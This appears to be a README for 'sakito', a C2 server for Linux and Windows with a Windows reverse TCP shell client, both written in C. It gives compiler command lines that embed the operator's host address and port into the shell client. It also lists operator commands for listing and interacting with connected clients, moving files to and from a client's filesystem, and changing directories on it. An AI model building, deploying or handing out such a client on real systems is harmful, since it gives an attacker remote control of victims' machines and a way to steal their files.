Multi-threaded, multi-os/platform (Linux/Windows) c2 server and Windows reverse TCP shell client both written in C.
Compiling reverse TCP shell client with i686-w64-mingw32-gcc:
i686-w64-mingw32-gcc sakito_revshell.c lib/windows/sakito_win_core.c -o sakito_revshell.exe -s -ffunction-sections -fdata-sections -fno-exceptions -fmerge-all-constants -static-libgcc -lws2_32 -D PORT=<port_number> -D HOST=\"<server_ipv4_address>\"
Compiling reverse TCP shell with cl.exe within Developer command prompt:
cl.exe sakito_revshell.c lib/windows/sakito_win_core.c /D PORT=<port_number> /D HOST=\"<server_ipv4_address>\"
Compiling Linux server with GCC:
gcc -pthread sakito_server.c lib/sakito_server_tools.c lib/linux/sakito_slin_utils.c -o sakito_server -D PORT=<port_number>
Compiling Windows server with cl.exe within Developer command prompt:
cl.exe sakito_server.c lib/windows/sakito_win_core.c lib/sakito_server_tools.c lib/windows/sakito_swin_utils.c /D PORT=<port_number>
Command list:
list: list available connections.
interact [id]: interact with client.
download [filename]: download a file from the client's filesystem to the server's filesystem.
upload [filename]: upload a file from the server's filesystem to the client's filesystem.
background: background client.
exit: terminate client or host.
cd [dir]: change directory on client or host.